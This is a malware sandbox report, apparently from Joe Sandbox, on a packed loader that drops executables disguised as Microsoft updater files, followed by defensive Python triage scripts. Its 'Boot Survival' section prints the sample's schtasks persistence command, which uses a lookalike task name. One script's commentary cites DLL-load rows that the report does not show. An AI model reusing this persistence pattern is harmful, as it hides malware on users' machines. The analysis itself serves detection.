Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
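The "Section loaded" rows above are mostly noise, but one pattern in them is worth turning into a check: binaries dropped under the user profile (xzuucncwbxucqic.exe, niyrycbicwuyiuc.exe) pull in winhttp/wininet, schannel and dnsapi, i.e. the whole outbound HTTP/TLS/DNS stack, which is what a stealer or loader needs before it beacons. The script below is an added example, not Joe Sandbox code: it parses rows in the report's own format, groups modules per process and flags user-writable-path processes that load that stack. The DLL list, the trusted-root list and the sample rows are this example's own assumptions (the rows are constructed from the report above, in both the run-together and the separated form).

```python
"""Group 'Section loaded' rows per process and flag user-path binaries that
load the network stack. Added example; the DLL set, trusted roots and the
sample rows are assumptions, not Joe Sandbox logic."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Accepts "…exeSection loaded: x.dll" (as extracted) and "…exe | Section loaded: x.dll".
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*Section loaded:\s*(?P<dll>\S+)",
    re.IGNORECASE)

# Modules that give a process outbound HTTP/TLS/DNS capability (assumed list).
NETWORK_STACK_DLLS = {"winhttp.dll", "wininet.dll", "webio.dll", "schannel.dll",
                      "ncryptsslp.dll", "dnsapi.dll", "mswsock.dll"}
# Roots treated as trusted by this rule; anything else counts as user-writable.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def modules_by_process(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Parse report rows into {process_path: [dll, ...]} in load order."""
    loaded: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            loaded[m.group("proc").strip()].append(m.group("dll").lower())
    return dict(loaded)


def is_user_writable(path: str) -> bool:
    """True when the image does not live under one of the trusted roots."""
    return not path.lower().startswith(TRUSTED_ROOTS)


def flag_user_path_network_loaders(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Return {process_path: sorted network dlls} for processes outside trusted roots."""
    hits: Dict[str, List[str]] = {}
    for proc, dlls in modules_by_process(lines).items():
        if not is_user_writable(proc):
            continue
        net = sorted(set(dlls) & NETWORK_STACK_DLLS)
        if net:
            hits[proc] = net
    return hits


# Constructed sample rows in the report's format (a subset of the rows above).
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: winhttp.dll",
    r"Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: schannel.dll",
    r"Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeSection loaded: dnsapi.dll",
    r"Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeSection loaded: wininet.dll",
    r"Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeSection loaded: apphelp.dll",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll",
]

if __name__ == "__main__":
    for proc, dlls in flag_user_path_network_loaders(SAMPLE_LINES).items():
        print(f"{proc} -> {', '.join(dlls)}")
```

powershell.exe loads dnsapi.dll too, but it runs from System32 and so is excluded; in a real triage the same rule is better fed from Sysmon event ID 7 (ImageLoaded) than from a sandbox report, and the trusted-root list should be tightened to what your estate actually signs.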
Source: C:\Windows\SysWOW64\tasklist.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Launcher.exe | Static PE information: 8191 exports found (threshold: 100)
Source: Launcher.exe | Static PE information: Virtual size of .text is bigger than 0x100000
Source: Launcher.exe | Static file information: File size 57894039 bytes is bigger than 1048576
Source: Launcher.exe | Static PE information: Raw size of .text (0xe04c00) is bigger than 0x100000
Source: Launcher.exe | Static PE information: Raw size of .rdata (0x2809000) is bigger than 0x100000
Source: Launcher.exe | Static PE information: More than 200 imports for KERNEL32.dll
Source: Launcher.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Launcher.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Launcher.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Launcher.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Launcher.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Launcher.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Launcher.exe | Static PE information: DllCharacteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Launcher.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: Launcher.exe, 00000000.00000000.1238969388.000000000334D000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Sun Aug 6 12:30:37 2023 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"QUICnot available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp
Source: Launcher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Launcher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Launcher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Launcher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Launcher.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: qzemwxiuzucyxcx.exe.0.dr | Static PE information: TimeDateStamp 0xA9D5AF7D [Fri Apr 16 15:06:37 2060 UTC], a compile date in the future
Source: initial sample | Static PE information: section where entry point is pointing to: .themida
Source: wxymrnibweqciwn.exe.0.dr | Static PE information: section name: (nameless)
Source: wxymrnibweqciwn.exe.0.dr | Static PE information: section name: (nameless)
Source: wxymrnibweqciwn.exe.0.dr | Static PE information: section name: (nameless)
Source: wxymrnibweqciwn.exe.0.dr | Static PE information: section name: (nameless)
Source: wxymrnibweqciwn.exe.0.dr | Static PE information: section name: .themida
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (nameless)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (nameless)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (nameless)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (nameless)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (nameless)
Source: niyrycbicwuyiuc.exe.0.dr | Static PE information: section name: (nameless)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (nameless)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (nameless)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (nameless)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (nameless)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (nameless)
Source: RuntimeBroker.exe.36.dr | Static PE information: section name: (nameless)
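The static findings above (a TimeDateStamp in 2060, several nameless sections, an entry point inside .themida, and .text/.rdata sections well over 1 MiB) all come straight from the PE headers, so they can be checked without running anything. The script below is an added example, not Joe Sandbox code: it parses the DOS/NT headers and section table with nothing but struct, and reports the same four indicators. The packer section-name list is this example's own assumption, and build_sample_pe() constructs a header-only PE32 blob that reproduces the report's values (timestamp 0xA9D5AF7D, a nameless section, a 0xE04C00-byte .text, entry point in .themida); it is not the real dropped file.

```python
"""Header-only PE triage for the indicators in the report above. Added
example, not Joe Sandbox code; the sample PE is constructed, not the real one."""
import struct
import time
from datetime import datetime, timezone
from typing import Optional

# Section names used by well-known protectors (assumed list; .themida is what the report shows).
PACKER_SECTION_NAMES = {".themida", ".vmp0", ".vmp1", "upx0", "upx1"}
ONE_MIB = 0x100000


def _section_name(raw: bytes) -> str:
    return raw.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def parse_pe_headers(pe: bytes) -> dict:
    """Read the DOS header, IMAGE_FILE_HEADER, entry point and section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER (20 bytes) follows the signature.
    (_machine, num_sections, timestamp, _symtab, _nsyms,
     opt_size, _chars) = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt_off)[0]
    if magic not in (0x10B, 0x20B):            # PE32 / PE32+
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    # AddressOfEntryPoint is at offset 16 in both PE32 and PE32+ optional headers.
    entry_rva = struct.unpack_from("<I", pe, opt_off + 16)[0]
    sections = []
    sec_off = opt_off + opt_size
    for i in range(num_sections):              # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, sec_off + 40 * i)
        sections.append({"name": _section_name(name), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": raw_size, "raw_pointer": raw_ptr})
    return {"timestamp": timestamp, "entry_rva": entry_rva, "sections": sections}


def triage(pe: bytes, now: Optional[float] = None) -> dict:
    """Return the header indicators an analyst would pull during static triage."""
    hdr = parse_pe_headers(pe)
    now = time.time() if now is None else now
    entry_section = None
    for s in hdr["sections"]:
        span = max(s["virtual_size"], s["raw_size"])
        if s["virtual_address"] <= hdr["entry_rva"] < s["virtual_address"] + span:
            entry_section = s["name"]
            break
    stamp = datetime.fromtimestamp(hdr["timestamp"], tz=timezone.utc)
    return {
        "timestamp_utc": stamp.strftime("%Y-%m-%d %H:%M:%S"),
        "timestamp_in_future": hdr["timestamp"] > now,
        "nameless_sections": sum(1 for s in hdr["sections"] if s["name"] == ""),
        "entry_section": entry_section,
        "entry_in_packer_section": (entry_section or "").lower() in PACKER_SECTION_NAMES,
        "oversized_sections": [s["name"] or "<nameless>"
                               for s in hdr["sections"] if s["raw_size"] > ONE_MIB],
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 headers (no code): TimeDateStamp 0xA9D5AF7D as in the
    report, one nameless section, a 0xE04C00-byte .text, entry point in .themida."""
    e_lfanew = 0x40
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # (Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)
    sections = [
        (b"",         0x1000,   0x1000,   0x400,    0x400),
        (b".text",    0xE04C00, 0x2000,   0xE04C00, 0x800),
        (b".themida", 0x10000,  0xE07000, 0x10000,  0xE05400),
    ]
    entry_rva = 0xE07100                          # falls inside .themida
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0xA9D5AF7D, 0, 0, 224, 0x0102)
    opt = bytearray(224)                          # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)         # Magic
    struct.pack_into("<I", opt, 16, entry_rva)    # AddressOfEntryPoint
    sec_table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        for name, vsize, va, raw_size, raw_ptr in sections)
    return bytes(dos) + b"PE\x00\x00" + file_hdr + bytes(opt) + sec_table


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key:24} {value}")
```

To run it against a real dropped file, pass open(path, "rb").read() to triage(); a future timestamp alone is weak evidence (some build chains deliberately randomise it), but together with nameless sections and an entry point inside a protector section it is the same combination the report flags.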
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020DFCA push ecx; ret 28_2_0020DFDD
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_001E04DD push ebx; iretd 29_2_001E04E3
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_001E04F7 push ebx; iretd 29_2_001E04F9
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_001CA775 push es; iretd 29_2_001CA776
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0020DFCA push ecx; ret 29_2_0020DFDD
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00452068 push ebx; ret 29_2_00452069
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00451100 pushfd ; retn 0041h29_2_00451101
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_00451D1A push es; retn 0042h29_2_00452065
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 29_2_0045365F push esi; iretd 29_2_00453660
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_009310F9 push FFFFFF82h; iretd 30_3_009310FB
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_009344F9 push edx; retf 30_3_009344FC
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_009328EC push edi; ret 30_3_009328F8
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00932C39 push ecx; ret 30_3_00932C59
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_0093525D push es; ret 30_3_00935264
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00933F89 push edi; iretd 30_3_00933F96
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00933FD4 push ss; retf 30_3_00933FF5
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_009321DC push eax; ret 30_3_009321DD
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00934D5E push esi; ret 30_3_00934D69
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_3_00930F6A push eax; ret 30_3_00930F75
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_009310F9 push FFFFFF82h; iretd 30_2_009310FB
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_009344F9 push edx; retf 30_2_009344FC
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_009328EC push edi; ret 30_2_009328F8
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00932C39 push ecx; ret 30_2_00932C59
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_0093525D push es; ret 30_2_00935264
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00933F89 push edi; iretd 30_2_00933F96
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00933FD4 push ss; retf 30_2_00933FF5
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_009321DC push eax; ret 30_2_009321DD
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00934D5E push esi; ret 30_2_00934D69
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeCode function: 30_2_00930F6A push eax; ret 30_2_00930F75
                      Source: xzuucncwbxucqic.exe.0.drStatic PE information: section name: .text entropy: 7.09207256696417
                      Source: wxymrnibweqciwn.exe.0.drStatic PE information: section name: entropy: 7.985393389809318
                      Source: niyrycbicwuyiuc.exe.0.drStatic PE information: section name: entropy: 7.914561090197707
                      Source: RuntimeBroker.exe.36.drStatic PE information: section name: entropy: 7.914561090197707
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeFile created: C:\ProgramData\WinUpdate32\RuntimeBroker.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\wxymrnibweqciwn.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeFile created: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exeFile created: C:\ProgramData\WinUpdate32\RuntimeBroker.exeJump to dropped file
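The static indicators listed above (an entry point inside a `.themida` section, several sections with no name, section entropy close to 8 bits per byte, and a build timestamp of 0xA9D5AF7D, which is a date in 2060) are the fingerprint of a commercially protected, packed payload. The script below is an added example, not Joe Sandbox code and not taken from the sample: it parses the PE section table with only the Python standard library and reports those checks. Because the dropped files are not reproduced here, `demo_findings()` builds a constructed PE32 image shaped like them (a nameless RWX section, a `.themida` RWX section holding the entry point, the report's timestamp); the 7.0 entropy threshold, the one-day clock tolerance and the list of "normal" code section names are assumptions you may want to tune.

```python
import hashlib
import math
import struct
import time
from collections import Counter
from datetime import datetime, timedelta, timezone

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
COFF_HDR = "<HHIIIHH"          # IMAGE_FILE_HEADER (20 bytes)
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER (40 bytes)
EXPECTED_CODE_SECTIONS = {".text", "CODE", ".code"}   # assumption: where a normal entry point lives
HIGH_ENTROPY = 7.0             # assumption: bits/byte; compressed or encrypted data sits near 8.0
CLOCK_SLACK = 86400            # assumption: one day of tolerance before a timestamp counts as "future"

def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def parse_pe(pe):
    """Read the COFF header, entry-point RVA and section table of a PE image (PE32 or PE32+)."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from(COFF_HDR, pe, coff)
    entry_rva = struct.unpack_from("<I", pe, coff + 20 + 16)[0]   # AddressOfEntryPoint, same offset in PE32/PE32+
    sections, off = [], coff + 20 + opt_size
    for _ in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(SECTION_HDR, pe, off)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va, "vsize": vsize,
                         "flags": flags, "data": pe[rawptr:rawptr + rawsize]})
        off += struct.calcsize(SECTION_HDR)
    return timestamp, entry_rva, sections

def triage(pe, now=None):
    """Static checks matching the report's indicators: future timestamp, nameless sections,
    high-entropy sections, writable+executable sections, entry point outside a code section."""
    now = time.time() if now is None else now
    timestamp, entry_rva, sections = parse_pe(pe)
    findings = []
    if timestamp > now + CLOCK_SLACK:
        built = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=timestamp)
        findings.append(f"timestamp 0x{timestamp:08X} is in the future ({built:%Y-%m-%d} UTC)")
    for s in sections:
        label = repr(s["name"]) if s["name"] else "<nameless>"
        if not s["name"]:
            findings.append(f"nameless section at RVA 0x{s['va']:X}")
        ent = shannon_entropy(s["data"])
        if ent > HIGH_ENTROPY:
            findings.append(f"section {label} entropy {ent:.2f} (likely packed or encrypted)")
        if s["flags"] & IMAGE_SCN_MEM_WRITE and s["flags"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {label} is writable and executable")
        if (s["va"] <= entry_rva < s["va"] + max(s["vsize"], len(s["data"]))
                and s["name"] not in EXPECTED_CODE_SECTIONS):
            findings.append(f"entry point 0x{entry_rva:X} lies in {label}, not a normal code section")
    return findings

def build_sample_pe(sections, timestamp, entry_rva):
    """Assemble a minimal, parseable (not loadable) PE32 image from (name, data, flags) triples.
    Constructed for offline testing only; it stands in for the dropped files, which are not included."""
    nsec, e_lfanew, opt_size = len(sections), 0x40, 0xE0
    first_raw = (e_lfanew + 4 + 20 + opt_size + 40 * nsec + 0x1FF) & ~0x1FF   # 512-byte file alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack(COFF_HDR, 0x14C, nsec, timestamp, 0, 0, opt_size, 0x102)   # i386, EXECUTABLE|32BIT
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)   # AddressOfEntryPoint
    table, blobs, raw_ptr, va = b"", b"", first_raw, 0x1000
    for name, data, flags in sections:
        table += struct.pack(SECTION_HDR, name.encode("latin-1").ljust(8, b"\0"),
                             len(data), va, len(data), raw_ptr, 0, 0, 0, 0, flags)
        blobs += data
        raw_ptr += len(data)
        va += (len(data) + 0xFFF) & ~0xFFF       # 4 KiB section alignment
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(first_raw, b"\0") + blobs

def demo_findings(now=1_741_000_000):
    """Constructed image shaped like the dropped files: ordinary .text, a nameless RWX section and a
    .themida RWX section of high-entropy data that holds the entry point, plus the 2060 timestamp.
    `now` defaults to March 2025 so the future-timestamp check is reproducible."""
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))   # 4096 pseudo-random bytes
    plain = bytes(range(256)) * 2 + b"\x90" * 1024                               # low-entropy stand-in for code
    image = build_sample_pe([(".text", plain, 0x60000020), ("", packed, 0xE0000040),
                             (".themida", packed, 0xE0000040)], timestamp=0xA9D5AF7D, entry_rva=0x3010)
    return triage(image, now)

if __name__ == "__main__":
    for finding in demo_findings():
        print("[!]", finding)
```

On a real dropped file call `triage(open(path, "rb").read())`; the checks are cheap enough to run over every file a sandbox drops. Entropy alone is not proof of packing (signed installers and media resources also score high), which is why the entry-point and nameless-section checks are reported alongside it.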

                      Boot Survival

                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"
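The persistence command above combines three tells: a one-minute repeat (`/SC MINUTE /MO 1`, a watchdog that relaunches the payload if it is killed), a binary under the user's AppData rather than Program Files, and a task name copied from the real Microsoft Edge updater tasks. The following hunting script is an added example, not part of the Joe Sandbox report: it parses `schtasks /Create` command lines as they would appear in process-creation telemetry (Sysmon event 1 or Windows event 4688) and scores each one on those three rules. The list of user-writable directories, the lookalike-name prefixes and the five-minute threshold are assumptions to extend for your environment; the sample command lines are constructed except for the first, which is the one recorded in this report.

```python
import re

# Assumption: paths a standard user can write to; legitimate updaters are installed under Program Files.
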